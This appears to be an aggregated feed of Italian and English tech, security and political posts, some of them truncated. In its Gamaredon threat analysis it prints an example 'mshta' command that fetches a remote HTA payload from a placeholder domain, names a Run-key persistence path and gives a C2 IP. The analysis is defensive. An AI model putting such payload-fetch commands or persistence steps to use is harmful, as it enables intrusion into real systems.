Politico.Eu incorona Meloni: “È la persona più potente d’Europa”. Ma ecco perché non è una buona notizia per l’Italia (né per l’Ue)
@Politica interna, europea e internazionale
La prestigiosa testata internazionale Politico.Eu incorona Giorgia Meloni come “persona più potente d’Europa” per il 2025 e la definisce “uomo forte”, sottolineando la sua pretesa di
Unexpectedly Interesting Payphone Gives Up Its Secrets
Reverse engineering a payphone doesn’t sound like a very interesting project, at least in the United States, where payphones were little more than ruggedized versions of residential phones with a coin mechanism attached. Phones in other parts of the world were far more interesting, though, as this look at the mysteries of a payphone from Israel reveals (in Hebrew; English translation here.)
This is a project [Inbar Raz] worked on quite a while ago, but only got around to writing up recently. The payphone in question was sourced from the usual surplus market channels, and appears to have been removed from service by Israeli telecommunications company Bezeq only shortly before he found it. It was in pretty good shape, and was even still locked tight, making some amateur locksmithing the first order of the day. The internals of the phone are surprisingly complex, with a motherboard that looks more like something from a PC. Date codes on the chips and through-hole construction date the device to the early- to mid-1990s.
With physical access gained, [Inbar] turned to the firmware. An Atmel flash chip seemed a good place to look, and indeed he was able to pull code off the chip. That’s where things took a turn thanks to the CPU the code was written for — the CDP1806, a later version of the more popular but still fringe CDP1802. This required [Inbar] to fall down the rabbit hole of writing a new processor definition file for Ghidra so that the firmware could be reverse-engineered. This got him to the point of understanding 1806 assembly well enough that he was able to re-flash the phone to print debugging messages on the built-in 16×2 LCD screen, which allowed him to figure out which routines were being called under various error conditions.
It doesn’t appear that [Inbar] ever completed the reverse engineering project, but as he points out, what does that even mean? He got inside, took a look around, and made the phone do some cool things it couldn’t do before, and in the process made things easier for anyone working with 1806 processors in Ghidra. That’s a pretty complete win in our books.
Ministero dell'Istruzione
Dalle 14 di oggi, mercoledì #11dicembre 2024, fino alle 23.59 di lunedì #30dicembre 2024, sarà possibile presentare la domanda di partecipazione alle nuove procedure concorsuali ordinarie, nell’ambito del “concorso PNRR 2”, per le #scuole di ogni ord…Telegram
Delfini in Missione Segreta: Come Proteggono le Basi Nucleari
I delfini attirano da tempo l’attenzione grazie alla loro incredibile intelligenza. Sono spesso raffigurati come creature degli oceani amichevoli, giocose e curiose, ma dietro questa immagine si nasconde un animale con straordinarie capacità di apprendimento, imitazione, consapevolezza di sé e risoluzione di problemi complessi. Queste qualità rendono i delfini un elemento importante dei programmi militari, inclusa la protezione delle basi dei sottomarini nucleari.
Gli Stati Uniti utilizzano i delfini nelle basi navali di King’s Bay in Georgia e Kitsap vicino a Seattle per proteggere gran parte del proprio arsenale nucleare. Ilprogramma per studiare le loro capacità iniziò nel 1959, quando la Marina americana condusse test non solo con i delfini, ma anche con leoni marini, tartarughe, squali e altri animali marini. Tuttavia, solo alcuni, come i delfini tursiopi e i leoni marini della California, hanno dimostrato sufficiente addestrabilità e utilità per scopi militari.
Negli anni ’80, il Navy Marine Mammal Program (NMMP) degli Stati Uniti manteneva più di 100 delfini con un budget di 8 milioni di dollari. Gli animali sono stati addestrati a trovare mine, consegnare messaggi e individuare sabotatori sottomarini. I leoni marini venivano addestrati a recuperare le mine dal fondo e le balene beluga pattugliavano le acque in cerca di minacce. Durante la guerra del Vietnam, i delfini hanno condotto la sorveglianza subacquea nella baia di Cam Ranh e nel 2003 hanno partecipato allo sminamento del porto di Umm Qasr in Iraq.
La chiave del successo dei delfini nelle operazioni militari è la loro ecolocalizzazione. Usando le onde sonore, gli animali sono in grado di formare “immagini” dettagliate del loro ambiente, comprese le acque torbide dove la tecnologia umana è spesso inutile. La loro resistenza fisica e la capacità di immergersi a grandi profondità rendono i delfini preziosi per la ricerca di oggetti come le mine in condizioni difficili.
Tuttavia, l’uso dei delfini per scopi militari è controverso. Attivisti per i diritti umani e gruppi ambientalisti hanno criticato tali programmi per lo sfruttamento degli animali senza autonomia e per i rischi che corrono nelle missioni pericolose. Tuttavia, i delfini rimangono una parte importante delle operazioni militari. Oggi, la Marina degli Stati Uniti addestra circa 85 delfini tursiopi e un piccolo numero di leoni marini.
Questi programmi, nonostante le questioni etiche, continuano a svilupparsi, offrendo opportunità uniche in condizioni in cui la tecnologia umana è ancora inferiore alle capacità naturali di questi animali.
L'articolo Delfini in Missione Segreta: Come Proteggono le Basi Nucleari proviene da il blog della sicurezza informatica.
ONU. Linee guida per contrastare violazioni dei diritti umani nella conservazione della natura
@Notizie dall'Italia e dal mondo
Il nuovo “Core Human Rights Principles for Private Conservation Organisations and Funders” elenca gli standard minimi che dovrebbero essere rispettati dalle organizzazioni che si occupano di ambiente
L'articolo ONU.
Lezioni di Storia della filosofia dei giorno 11 e 12 dicembre 2024
Su E Learning Unisalento – Storia della filosofia (cui gli studenti sono pregati di iscriversi mediante mail istituzionale unisalento e con la pw fornita dagli uffici) trovate la lezione del giorn…fabiosulpizioblog
Lezione di Storia della filosofia francese del 10 dicembre 2024
Sul portale E Learning Unisalento – Storia della filosofia francese (cui gli studenti sono pregati di iscriversi mediante mail istituzionale Unisalento e con la pw fornita dagli uffici) trovate la …fabiosulpizioblog
PALESTINA. Artisti chiedono pace, giustizia e libertà
@Notizie dall'Italia e dal mondo
"Viva Viva Palestina" è una rete di artisti che nasce a Genova e che ha come finalità la diffusione e la divulgazione della cultura e dell’arte della Palestina. Insieme a Defence for Children International Italia, il 16 dicembre organizzeranno un grande evento a scopo benefico
L'articolo PALESTINA. Artisti
The Math Behind the Music of the 80s
Although there might have been other music produced or recorded in the 1980s, we may never know of its existence due to the cacophony of all of the various keytars, drum machines, and other synthesized music playing nonstop throughout the decade. There was perhaps no more responsible synthesizer than the Yamaha DX7 either; it nearly single-handedly ushered in the synth pop era. There had been other ways of producing similar sounds before but none were as unique as this keyboard, and for ways beyond just its sound as [Kevin] describes in this write-up.
Part of the reason the DX7 was so revolutionary was that it was among the first accessible synthesizers that was fully digital, meaning could play more than one note at a time since expensive analog circuitry didn’t need to be replicated for multiple keys. But it also generated its tones by using frequency modulation of sine waves in a way that allowed many signals to be combined to form different sounds. While most popular musicians of the 80s used one of the preset sounds of the synthesizer, it could produce an incredible range of diverse sounds if the musician was willing to dig a bit into the programming of this unique instrument.
There were of course other reasons this synthesizer took off. It was incredibly robust, allowing a musician to reliably carry it from show to show without much worry, and it also stood on the shoulders of giants since musicians had been experimenting with various other types of synthesizers for the previous few decades. And perhaps it was at the right place and time for the culture as well. For a look at the goings on inside the chip that powered the device, [Ken Shirriff] did a deep dive into one a few years ago.
Il gran finale di Microsoft per il 2024: 1 Zero-Day, 71 CVE e una corsa contro il tempo
Con il Patch Tuesday di dicembre, Microsoft chiude il 2024 con un’ultima serie di aggiornamenti di sicurezza, portando il totale del mese a 71 CVE (Common Vulnerabilities and Exposures). Questo mese segna la terza più ridotta distribuzione di patch dell’anno, preceduta solo da gennaio e giugno. Tuttavia, la dimensione ridotta non significa che manchino criticità: tra le vulnerabilità risolte, figura un pericoloso zero-day già sfruttato attivamente, CVE-2024-49138.
La Vulnerabilità CVE-2024-49138
Questa vulnerabilità di elevazione dei privilegi colpisce il sistema Windows Common Log File System e consente agli attaccanti di ottenere privilegi SYSTEM, il che significa accesso completo al sistema bersaglio. Non sorprende che Microsoft abbia posto un accento particolare su questa falla, considerando che è già oggetto di attacchi attivi e riguarda ogni versione supportata di Windows e Windows Server. L’applicazione immediata delle patch è cruciale per prevenire potenziali compromissioni, mentre Microsoft ha fornito poche informazioni tecniche, se non per sottolineare la gravità del problema.
Oltre allo Zero-Day, tra le 16 vulnerabilità classificate come “critiche”, spicca CVE-2024-49112, una falla di esecuzione di codice remoto nel protocollo Windows Lightweight Directory Access Protocol (LDAP). Con un punteggio di gravità di 9.8 su 10, è questione di tempo prima che venga sfruttata attivamente.
Per chi non può aggiornare immediatamente, Microsoft ha fornito mitigazioni temporanee:
- Configura i controller di dominio per bloccare l’accesso a Internet.
- Impedisci l’accesso RPC in ingresso da reti non fidate.
Queste misure non solo proteggono contro CVE-2024-49112, ma rappresentano buone pratiche di sicurezza generale, come sottolineato da Tyler Reguly, direttore associato di Security R&D presso Fortra. “Microsoft ha fornito mitigazioni che sono fondamentalmente norme di buona gestione informatica, ma servono come promemoria importante per le imprese,” ha dichiarato Reguly.
Il protocollo Windows Remote Desktop Services continua a essere un bersaglio privilegiato per gli attaccanti, con 9 delle vulnerabilità critiche di questo mese che riguardano l’esecuzione di codice remoto in questa componente. Questo evidenzia quanto sia essenziale per le aziende adottare configurazioni sicure e applicare immediatamente gli aggiornamenti forniti.
Altre vulnerabilità rilevanti includono falle critiche in componenti chiave come LSASS, Hyper-V e Microsoft Message Queuing (MSMQ), tutte potenziali vettori per attacchi devastanti se non affrontate tempestivamente.
Conclusione
Microsoft chiude il sipario del 2024 con un ultimo Zero-Day e un pacchetto di patch che richiede attenzione immediata. Agire con rapidità è essenziale per proteggere i sistemi e prepararsi al futuro di un panorama di minacce in continua evoluzione.
Nel 2025, la parola d’ordine sarà prevenzione: applicare tempestivamente le patch oggi rappresenta l’investimento più efficace per evitare interruzioni critiche e vulnerabilità costose in futuro.
L'articolo Il gran finale di Microsoft per il 2024: 1 Zero-Day, 71 CVE e una corsa contro il tempo proviene da il blog della sicurezza informatica.
Utilizzavano AirBnb per allestire call center fraudolenti. Accade in Belgio e Paesi Bassi
Europol denuncia l’arresto di otto membri di un gruppo internazionale di criminalità informatica che ha rubato milioni di euro alle sue vittime. Gli indagati hanno affittato immobili e appartamenti di lusso tramite Airbnb e vi hanno creato call center fraudolenti.
I membri del gruppo sono stati arrestati in Belgio e nei Paesi Bassi all’inizio di dicembre 2024. È stato inoltre riferito che contemporaneamente in due paesi sono state effettuate 17 perquisizioni, durante le quali la polizia ha sequestrato supporti di memorizzazione, telefoni e vari oggetti di lusso, che presumibilmente sarebbero stati acquistati con i proventi di crimini informatici.
La polizia olandese riferisce dell’arresto di tre uomini e una donna, di età compresa tra 23 e 66 anni. I sospettati sono accusati di phishing, frode online, frode bancaria, riciclaggio di denaro e coinvolgimento in attività criminali informatiche.
Secondo le forze dell’ordine, il gruppo ha condotto le sue campagne di phishing da call center temporanei che i truffatori hanno allestito in appartamenti di lusso affittati tramite Airbnb.
I truffatori hanno contattato le vittime dei paesi europei tramite e-mail, SMS o messaggi WhatsApp e si sono spacciati per impiegati di banca o funzionari delle forze dell’ordine che presumibilmente lavorano per combattere le frodi. Hanno scritto e chiamato le vittime, sostenendo che i loro conti erano stati compromessi e invitando le persone a cliccare rapidamente sui collegamenti ai siti di phishing che imitavano le banche reali.
Se un utente si innamorava dei truffatori (e il bersaglio degli aggressori erano spesso persone anziane) e immetteva i propri dati personali su queste pagine dannose, queste finivano nelle mani degli aggressori, che svuotavano rapidamente gli account della vittima.
Allo stesso tempo, secondo gli investigatori, gli aggressori hanno speso i fondi rubati in un modo molto insolito: acquistando viaggi costosi, abiti firmati, orologi premium, auto di lusso e organizzando feste in club chiusi.
Le forze dell’ordine hanno botato che i sospettati non hanno nemmeno cercato di nascondersi e hanno apertamente dimostrato uno stile di vita lussuoso sui social network, pubblicando regolarmente immagini di beni costosi e foto con celebrità.
L'articolo Utilizzavano AirBnb per allestire call center fraudolenti. Accade in Belgio e Paesi Bassi proviene da il blog della sicurezza informatica.
APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio
Il gruppo di Advanced Persistent Threat (APT) APT-C-53, noto anche come Gamaredon, Primitive Bear, Winterflounder e BlueAlpha, è un’entità di cyber spionaggio sponsorizzata dallo stato russo. Attivo dal 2013, è focalizzato su operazioni di intelligence contro organizzazioni governative, enti della difesa, istituzioni diplomatiche e media, con particolare attenzione all’Ucraina. Questo articolo fornisce un’analisi tecnica dettagliata delle metodologie e degli strumenti utilizzati da APT-C-53 nelle operazioni più recenti, facendo riferimento ai dati forniti da diverse fonti di Threat Intelligence, inclusa un’analisi pubblicata su WeChat.
Tecniche di Attacco e Vettori di Infezione
La mappa delle connessioni riportata nell’immagine evidenzia chiaramente la complessità dell’infrastruttura e delle tattiche impiegate dal gruppo APT-C-53 (Gamaredon). Come mostrato, l’attacco è caratterizzato da una rete intricata di indirizzi IP, domini malevoli e diverse tipologie di file utilizzati per distribuire i payload. Ogni nodo rappresenta un elemento cruciale della catena di infezione, mentre le frecce illustrano le relazioni tra i vari componenti del processo di attacco, dai server di comando e controllo (C2) fino ai file malevoli utilizzati per compromettere i sistemi delle vittime.
L’analisi visiva consente di comprendere come APT-C-53 sfrutti più vettori contemporaneamente per garantire il successo delle sue campagne di cyber spionaggio. Nei paragrafi seguenti, analizzeremo in dettaglio le tecniche di attacco più rilevanti e i vettori di infezione identificati, facendo riferimento ai collegamenti mostrati nell’immagine.
1. File LNK Maligni
APT-C-53 utilizza file di collegamento Windows (LNK) come vettore iniziale di infezione. Questi file contengono comandi che vengono eseguiti tramite processi legittimi come mshta.exe
. L’obiettivo è eseguire script remoti dannosi senza destare sospetti. I file LNK sono spesso inseriti in archivi compressi distribuiti tramite email di phishing.
Esempio di Comando LNK:
mshta http://malicious-domain/payload.hta
2. File XHTML Malevoli
Un altro vettore di attacco comune è l’uso di file XHTML che scaricano e eseguono payload dannosi. Questi file vengono mascherati da documenti legittimi e, una volta aperti, eseguono script che stabiliscono una connessione con un server di comando e controllo (C2) per il download del malware principale.
Tecnica di Download Dinamico:
3. Campagne di Spear-Phishing
APT-C-53 eccelle nelle campagne di spear-phishing mirate. Le email sono personalizzate per ingannare specifici destinatari, spesso utilizzando temi rilevanti per il contesto geopolitico e istituzionale della vittima. Gli allegati includono documenti Office compromessi o archivi compressi contenenti file LNK o script dannosi.
Strumenti e Malware Impiegati
1. Pteranodon
Un trojan modulare utilizzato per ottenere accesso remoto ai sistemi infetti. Consente di eseguire comandi, esfiltrare dati e scaricare ulteriori moduli malevoli.
Funzionalità principali:
- Esecuzione di comandi remoti
- Esfiltrazione di file sensibili
- Persistenza tramite chiavi di registro
2. LitterDrifter
Un worm scritto in VBScript (VBS) progettato per diffondersi tramite unità USB rimovibili. Questo malware sfrutta il trasferimento fisico di dispositivi per penetrare reti isolate.
Meccanismo di Diffusione:
- Copia del file VBS nelle unità rimovibili
- Creazione di file LNK dannosi nella root dell’unità USB
- Esecuzione automatica tramite modifiche al file
autorun.inf
3. GammaLoad e GammaSteel
Varianti di malware utilizzate per eseguire il download di ulteriori payload e mantenere il controllo persistente del sistema compromesso. Entrambi i malware sfruttano script PowerShell per comunicare con i server C2 e ricevere comandi dinamici.
Tecniche di Persistenza e Obfuscation
APT-C-53 implementa diverse tecniche di persistenza per mantenere l’accesso ai sistemi compromessi:
- Modifiche al Registro di Sistema:
- Esecuzione automatica dei payload malevoli tramite chiavi di registro:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- Obfuscation degli Script:
- Uso di stringhe codificate in Base64, compressione e tecniche di offuscamento del codice per eludere i sistemi di rilevamento.
- Infettare Dispositivi Rimovibili:
- Propagazione del malware tramite unità USB, facilitando la diffusione in ambienti chiusi o con limitata connettività esterna.
Infrastruttura di Comando e Controllo (C2)
L’infrastruttura C2 di APT-C-53 è composta da server che forniscono payload malevoli e ricevono dati esfiltrati. Il gruppo utilizza:
- Indirizzi IP Dinamici e domini temporanei per evitare il blocco delle comunicazioni.
- Tecniche di Fast Flux per cambiare frequentemente gli indirizzi IP associati ai domini C2.
Esempio di IP associato: 5.181.189.32
Settori Colpiti
I settori principali presi di mira da APT-C-53 includono:
- Governo
- Difesa
- Diplomazia
- Media
- Attivisti e ONG
APT-C-53 (Gamaredon) rappresenta una delle minacce più persistenti e sofisticate nell’ambito del cyber spionaggio. L’utilizzo di tecniche avanzate di infezione, obfuscation e persistenza sottolinea l’importanza di implementare misure di sicurezza robuste come:
- Filtri avanzati per email e allegati
- Monitoraggio delle modifiche al registro di sistema
- Segmentazione della rete e restrizioni sui dispositivi USB
- Aggiornamenti costanti dei sistemi di rilevamento delle minacce
Rimanere aggiornati sulle TTP (Tactics, Techniques, and Procedures) di Gamaredon è essenziale per proteggere le infrastrutture critiche e prevenire potenziali compromissioni.
L'articolo APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio proviene da il blog della sicurezza informatica.
From Felt to Fate: Building Your Own Sorting Hat
Ever wondered how it feels to have the Sorting Hat decide your fate? [Will Dana] wanted to find out, so he conjured a bit of Hogwarts magic, and crafted a fully animatronic Sorting Hat from scratch. In the video below, he covers every step of bringing this magical purple marvel to life—from rapid joystick movements to the electronics behind it all.
The heart of the project is two 9g servos—one actuates the mouth, and the other controls the eyebrows—powered by an ESP32 microcontroller. Communication between two ESP32 boards ensures smooth operation via the ESP-NOW protocol, making this a wireless wonder. The design process involved using mechanical advantage to solve jittery servo movements, a trick that will resonate with anyone who’s fought with uncooperative motors.
If animatronics or themed projects excite you, Hackaday has covered similar builds, from a DIY BB-8 droid to a robot fox.
youtube.com/embed/I_xfRrZDjNA?…
L’AGI è ancora lontano? Ecco il test ARC-AGI che mette in palio Un Milione di Dollari
L’AI General Guidance Test (AGI), sviluppato nel 2019 da Francois Chollet, ha portato a importanti scoperte sui limiti della tecnologia. Gli autori del test affermano che i risultati sono più una prova di carenze che una vera svolta nel campo della ricerca AGI.
Il test ARC-AGI (Abstract and Reasoning Corpus for Artificial General Intelligence) è stato progettato come strumento per valutare la capacità dell’IA di apprendere nuove competenze oltre i dati di addestramento.
Fino al 2024, i migliori modelli di intelligenza artificiale potrebbero risolvere meno di un terzo dei problemi ARC-AGI. Chollet ha criticato l’attenzione dell’industria sui modelli linguistici di grandi dimensioni (LLM), ritenendo che fossero incapaci di un vero “ragionamento”. Secondo Chollet, gli LLM si basano esclusivamente sulla memorizzazione, il che li rende vulnerabili alle sfide che vanno oltre il set di dati di formazione.
Per stimolare la ricerca oltre il LLM, Chollet, insieme a Mike Knoop, co-fondatore di Zapier, ha lanciato un concorso da 1 milione di dollari nel giugno 2024 per creare un sistema di intelligenza artificiale aperto in grado di battere ARC-AGI. Il miglior risultato della competizione è stato del 55,5%, quasi il 20% in più rispetto al record precedente, ma ancora lontano dalla soglia dell’85%, considerata il “livello umano” e necessario per vincere.
Come ha osservato Knoop nel blog, tali risultati non indicano progressi significativi verso la creazione dell’AGI. Molti partecipanti al concorso hanno utilizzato un approccio di forza bruta per trovare soluzioni, il che mette in discussione il valore dei compiti dell’ARC-AGI per la valutazione dell’intelligenza generale.
ARC-AGI prevede compiti in cui l’IA deve generare risposte corrette sotto forma di griglie composte da quadrati di diversi colori. I compiti sono volti a testare la capacità di adattamento a nuovi problemi. Tuttavia, l’efficacia di questo approccio ha sollevato dubbi.
Griglia di output della risposta ARC-AGI ( arcprize.org )
Gli ideatori del test ne riconoscono le imperfezioni. Secondo Knoop, il test è rimasto invariato sin dal suo inizio e le critiche nei suoi confronti come strumento per ottenere l’AGI non hanno fatto altro che aumentare.
Il concetto stesso di AGI è ulteriormente controverso: alcuni esperti ritengono che l’AGI sia già stata raggiunta se interpretata come la capacità dell’IA di sovraperformare gli esseri umani nella maggior parte dei compiti.
Gli esperti prevedono di presentare la seconda versione del test ARC-AGI nel 2025, il cui obiettivo principale è indirizzare gli sforzi della comunità di ricerca per risolvere problemi chiave nel campo dell’IA e accelerare l’approccio all’AGI.
L'articolo L’AGI è ancora lontano? Ecco il test ARC-AGI che mette in palio Un Milione di Dollari proviene da il blog della sicurezza informatica.
A Potential Exploit with the Ext Filesystem
The extended filesystem, otherwise known as ext, has been a fundamental part of Linux since before the 1.0 release in 1994. Currently the filesystem is on its fourth major revision, in use since its release in 2008 thanks to its stability, reliability, and backwards compatibility with the other ext filesystem versions. But with that much history there are bound to be a few issues cropping up here and there. [Will] recently found an exploit with this filesystem that can cause a Linux kernel to immediately panic when a manipulated USB drive is inserted into a computer.
[Will] discovered this quirk when investigating the intricacies of the filesystem for problems and other vulnerabilities. A tool called tune2fs, used for administering and modifying ext filesystems, includes the ability to pass certain commands to the Linux kernel when certain situations arise with the filesystem itself, including that the kernel should panic. One situation is that the ext filesystem itself becomes corrupted, which can then cause the kernel panic. Armed with this knowledge, a USB drive can be purposefully given a corrupted ext filesystem which, when plugged into a Linux machine, can cause the computer to shut down.
The post linked above goes into some discussion about how this exploit could be used maliciously to gain access to a Linux system, including rebooting computers where no access to a power button is otherwise enabled or making other changes to the system before needing a reboot to apply the changes. In general, though, it’s good to assume an attacker could take any route to gain access to a machine. This exploit from a few years ago, for example, allowed another Linux tool to be used to gain root access.
Thanks to [Timothy] for the tip!
Flying Drones That Can Walk and Jump into the Air: An Idea With Legs?
When we look at how everyone’s favorite flying dinosaurs get around, we can see that although they use their wings a lot too, their legs are at least as important. Even waddling or hopping about somewhat ungainly on legs is more energy efficient than short flights, and taking off from the ground is helped by jumping into the air with a powerful leap from one’s legs. Based on this reasoning, a team of researchers set out to give flying drones their own bird-inspired legs, with their findings published in Nature (preprint on ArXiv).
The prototype RAVEN (Robotic Avian-inspired Vehicle for multiple ENvironments) drone is capable of hopping, walking, jumping onto an obstacle and jumping for take-off. This allows the drone to get into the optimal position for take-off and store energy in its legs to give it a boost when it takes to the skies. As it turned out, having passive & flexible toes here was essential for stability when waddling around, while jumping tests showed that the RAVEN’s legs provided well over 90% of the required take-off speed.
During take-off experiments the drone was able to jump to an altitude of about 0.4 meters, which allows it to clear ground-based obstacles and makes any kind of ‘runway’ unnecessary. Much like with our avian dinosaur friends the laws of physics dictate that there are strong scaling limits, which is why a raven can use this technique, but a swan or similar still requires a bit of runway instead of jumping elegantly into the air for near-vertical take-off. For smaller flying drones this approach would however absolutely seem to have legs.
youtube.com/embed/-8DJ1a3sLIc?…
#tentapes è un hub per la #musica #elettronica (#techno e non). In un mondo sempre più legato a tendenze e cliché fortemente codificati, tentapes mira a riportare la libertà di espressione e l'arte al centro della musica da club, potenziandone la creatività.
tentapes BUFFET ep. 1 - RVRSRVR Live
peertube.uno/w/msn4it7AaGcAuf1…
djpanini reshared this.
Il servizio del Tg3, andato oggi in onda nelle edizioni delle 14,20, ha confermato quanto ho denunciato immediatamente. In un impianto ENI inserito nella Direttiva Seveso III a effettuare le operazioni di carico delle autobotti non sono lavoratori specializzati con contratto dei chimici ma gli stessi camionisti. Per questo sono morti loro. Su questa gravissima circostanza presenterò un esposto all’autorità giudiziaria nelle prossime ore.
Gli autotrasportatori sono stati ammazzati da un sistema che scarica su di loro le operazioni di carico ad alto rischio.
A Calenzano, come ovunque in Italia, anche negli impianti Eni, si è risparmiato sui costi del personale per il carico facendo fare direttamente ai camionisti un lavoro per il quale non hanno quasi sempre una formazione specifica né tanto meno opportuna copertura assicurativa. Questo sistema, che coinvolge anche una grande società come Eni, crea una situazione di altissimo rischio considerato che così si gestiscono quasi ovunque in Italia materiali infiammabili e tossici
Si tratta di una cosa che in Germania, in Francia e gran parte d’Europa non accade: in altri paesi l’autotrasportatore consegna il mezzo agli operatori e ci risale sopra dopo che il personale ha concluso le operazioni. Per assicurarsi i contratti le ditte di trasporti accettano di farsi carico di queste operazioni e così fanno anche i padroncini che, essendo cottimisti e subordinati, sono di fatto l’anello debole della catena dei subappalti, costretti a lavorare perennemente nella fretta.
È molto grave che ENI non abbia ancora fornito informazioni al riguardo. Le autorità competenti dovrebbero appurare immediatamente se queste sono le circostanze della strage. Non accetto che si parli di errore umano perché, se quanto mi riferiscono camionisti è vero, degli onesti lavoratori sono morti a causa di un sistema che fa profitti sulla loro pelle. Siamo di fronte a omicidi bianchi di cui portano la responsabilità non solo l’ENI e tutte le autorità che avrebbero dovuto garantire la sicurezza. Ci rendiamo conto che questo sistema operava in un sito ad altissima pericolosità e che l’esplosione estendendosi a tutto l’impianto avrebbe potuto provocare un disastro ancor più devastante? Credo che l’autorità giudiziaria dovrebbe verificare se quanto ho appreso corrisponda al vero e inviterei le procure a estendere i controlli a tutta Italia. Non è tollerabile che in impianti che rientrano nella direttiva Seveso, o comunque ad alta pericolosità, si consentano operazioni di carico senza personale specializzato. Mi dicono che in qualche caso il personale ci sarebbe ma si tratterebbe non di lavoratori inquadrati nel contratto dei chimici ma di cooperative sociali.
La situazione che denuncio dicono che sia normale ma non lo è se Oltralpe accade il contrario. Il fatto che in questa condizione si trovano quotidianamente gli autotrasportatori italiani rende l’idea di quale sia il rispetto per le condizioni di sicurezza di chi lavora nel nostro paese. Approfittando di una normativa non chiara per quanto riguarda le competenze di caricatori e trasportatori le imprese si sono scaricate i costi relativi alla gestione di questa situazione di rischio.
Ai familiari delle vittime e dei dispersi la solidarietà del Partito della Rifondazione Comunista.
Maurizio Acerbo, segretario nazionale del Partito della Rifondazione Comunista
Maronno Winchester reshared this.
3D Printer Eliminates the Printer Bed
Anyone who has operated a 3D printer before, especially those new to using these specialized tools, has likely had problems with the print bed. The bed might not always be the correct temperature leading to problems with adhesion of the print, it could be uncalibrated or dirty or cause any number of other issues that ultimately lead to a failed print. Most of us work these problems out through trial and error and eventually get settled in, but this novel 3D printer instead removes the bed itself and prints on whatever surface happens to be nearby.
The printer is the product of [Daniel Campos Zamora] at the University of Washington and is called MobiPrint. It uses a fairly standard, commercially available 3D printer head but attaches it to the base of a modified robotic vacuum cleaner. The vacuum cleaner is modified with open-source software that allows it to map its environment without the need for the manufacturer’s cloud services, which in turn lets the 3D printer print on whichever surface the robot finds in its travels. The goal isn’t necessarily to eliminate printer bed problems; a robot with this capability could have many more applications in the realm of accessibility or even, in the future, printing while on the move.
There were a few surprising discoveries along the way which were mentioned in an IEEE Spectrum article, as [Campos Zamora] found while testing various household surfaces that carpet is surprisingly good at adhering to these prints and almost can’t be unstuck from the prints made on it. There are a few other 3D printers out there that we’ve seen that are incredibly mobile, but none that allow interacting with their environment in quite this way.
youtube.com/embed/SknW-Oygh3w?…
DarkLab Report : Dal Cybercrime al Cyber Organized Crime (COC)
Il cybercrime rappresenta un universo in costante espansione, capace di attirare non solo l’interesse di singoli hacker esperti di informatica, ma anche di criminali tradizionali e organizzazioni ben strutturate, con obiettivi complessi e su larga scala.
L’espansione del Dark Web, con i suoi forum, chat e mercati anonimi e illegali, ha permesso di interconnettere i cybercriminali tra loro, facilitando la comunicazione e abbattendo le barriere geografiche tipiche del crimine tradizionale. Questo ha portato a un aumento dei fenomeni illeciti, come la condivisione di informazioni riservate, account personali o aziendali e database di vario tipo. Tra le attività più rilevanti in questo underground tecnologico si distingue il narcotraffico, che ha trovato nuovi spazi per espandersi e superare i confini territoriali. Inoltre, si è registrato un costante aumento di truffe (SCAM), accompagnato da un incremento del traffico di esseri umani e della diffusione di materiale pedopornografico.
Scarica il report “Dal Cybercrime al Cyber Organized Crime (COC) di DarkLab
Le criptovalute, come Monero e Bitcoin, sono diventate uno dei principali mezzi di pagamento nel cybercrime. La loro diffusione ha contribuito in modo significativo al radicamento del crimine informatico e alla sua crescita costante, rendendo estremamente complessa l’attività investigativa condotta dalle forze dell’ordine.
La facilità di utilizzo di queste piattaforme criminali, l’assenza di barriere significative e l’uso di criptovalute, facili da scambiare e ripulire, hanno attirato l’attenzione delle principali organizzazioni mafiose e dei gruppi criminali organizzati.
Ho deciso di redigere questo report per fornire una panoramica dettagliata sullo stato attuale del cybercrime, analizzando come il crimine organizzato e le mafie sfruttino questo contesto per accrescere il proprio potere ed espandere le loro attività, sia a livello territoriale che virtuale.
Nella prima parte esamineremo l’ambiente underground del web, dove si svolgono molteplici attività illecite: dallo spaccio di farmaci e stupefacenti alla pedopornografia, fino alle truffe di vario tipo. Nella seconda parte, ci concentreremo sul fenomeno del Cyber Organized Crime (COC), analizzando i gruppi che hanno attirato maggiore attenzione da parte delle forze dell’ordine. Concluderemo esplorando come i social network rappresentino uno strumento potente per le mafie, consentendo loro di costruire consenso, soprattutto tra i più giovani.
Scarica il report “Dal Cybercrime al Cyber Organized Crime (COC)” di DarkLab
L'articolo DarkLab Report : Dal Cybercrime al Cyber Organized Crime (COC) proviene da il blog della sicurezza informatica.
Trasferimento dati personali ad Autorità extra UE: l’EDPB chiarisce quando è lecito
@Informatica (Italy e non Italy 😁)
Le linee guide dell’EDPB sull’articolo 48 del GDPR ribadiscono che una decisione giudiziaria straniera o una richiesta di un'autorità straniera non costituiscono un presupposto di liceità per il trasferimento di dati
Stato dell’arte cyber in UE, Enisa: essenziale una cooperazione operativa
@Informatica (Italy e non Italy 😁)
Nel documento dal titolo “2024 Report on the state of cybersecurity in the Union”, Enisa fornisce un'analisi approfondita e dati concreti sullo sviluppo delle capacità di cibersicurezza a vari livelli, offrendo anche raccomandazioni strategiche per
Trasparenza e privacy nei concorsi pubblici: c’è ancora qualcosa da sistematizzare
@Informatica (Italy e non Italy 😁)
La recente sanzione privacy comminata all’INPS per la diffusione dei dati personali di migliaia di partecipanti a un concorso pubblico induce a ritornare sull’esigenza di individuare un equilibrato baricentro fra le
Sistemi XDR (eXtended Detection and Response): a cosa servono, come funzionano, i più efficaci
@Informatica (Italy e non Italy 😁)
I sistemi XDR (eXtended Detection and Response) sono soluzioni di sicurezza integrate per il controllo non solo degli endpoint, ma anche dei gateway di posta elettronica, dei servizi cloud e degli accessi. Ecco di
NIS 2 e ISO 9001: modello ibrido per la gestione integrata della qualità e della cyber security
@Informatica (Italy e non Italy 😁)
In un’epoca in cui sicurezza informatica e qualità dei processi aziendali sono essenziali per la competitività e la sostenibilità, l'integrazione tra ISO 9001 e decreto NIS 2 rappresenta un’opportunità per le
Trying to Shatter the World’s Fastest RC Car Record
The RC car is controlled via an FPV setup. (Credit: Luke Bell, YouTube)
Fresh off a world record for the fastest quadcopter, [Luke Bell] decided to try his luck with something more own to earth, namely trying to tackle the world record for the fastest RC car, with the current record set at 360 km/h. Starting off with a first attempt in what will be a video series, the obvious approach seems to be to get some really powerful electric motors, a streamlined body and a disused runway to send said RC car hurtling along towards that golden medal. Of course, if it was that easy, others would have done it already.
